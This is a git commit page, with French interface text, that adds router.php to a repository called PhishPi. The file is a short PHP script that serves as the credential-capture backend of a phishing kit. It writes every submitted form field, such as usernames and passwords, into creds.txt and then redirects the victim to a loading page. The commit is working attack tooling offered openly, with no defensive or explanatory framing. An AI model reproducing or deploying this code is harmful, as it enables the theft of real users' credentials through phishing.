Parcourir la source

Create router.php

assume-breach il y a 3 ans
Parent
commit
74fd08f789
1 fichiers modifiés avec 13 ajouts et 0 suppressions
  1. 13 0
      PhishPi/Resources/router.php

+ 13 - 0
PhishPi/Resources/router.php

@@ -0,0 +1,13 @@
+<?php
+header ('Location:http://domain/loading.html');
+$handle = fopen("creds.txt", "a");
+foreach($_POST as $variable => $value) {
+   fwrite($handle, $variable);
+   fwrite($handle, "=");
+   fwrite($handle, $value);
+   fwrite($handle, "\r\n");
+}
+fwrite($handle, "\r\n");
+fclose($handle);
+exit;
+?>